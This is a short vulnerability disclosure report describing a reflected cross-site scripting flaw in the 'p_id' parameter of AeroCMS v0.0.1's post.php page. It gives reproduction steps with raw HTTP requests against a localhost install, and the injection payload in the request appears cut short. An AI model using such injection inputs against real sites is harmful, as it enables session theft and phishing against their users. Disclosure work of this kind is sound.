Reflected XSS Vulnerability on AeroCMS v0.0.1

[rahadchowdhury]

Description: I found Cross site scripting (XSS) vulnerability in your AeroCMS (v0.0.1) post.php page "p_id" parameter. When I use malicious code or use any XSS payload then the browser give me result. Because a browser can not know if the script should be trusted or not.

CMS Version: v0.0.1

Affected URL: http://127.0.0.1/AeroCMS/post.php

Steps to Reproduce:

1. At first open http://127.0.0.1/AeroCMS/
2. then click "Read More" button from page post.
3. then your request data will be

GET /AeroCMS/post.php?p_id=1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close

4. "p_id" parameter is vulnerable. Let's try to use XSS payload "> or use any XSS payload in "p_id" parameter and your request data will be

GET /AeroCMS/post.php?p_id=1"> HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Cookie: PHPSESSID=qtj8dhp0jub18i2agkfm4bf5ea Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close

5. Catch!! You will see xss popup.

Proof of Concept: You can see the Proof of Concept. which I've attached screenshots to confirm the vulnerability.

Impact: Attackers can make use of this to conduct attacks like phishing, steal sessions etc.

Let me know if any further info is required.

Thanks & Regards Rahad Chowdhury Cyber Security Specialist https://www.linkedin.com/in/rahadchowdhury/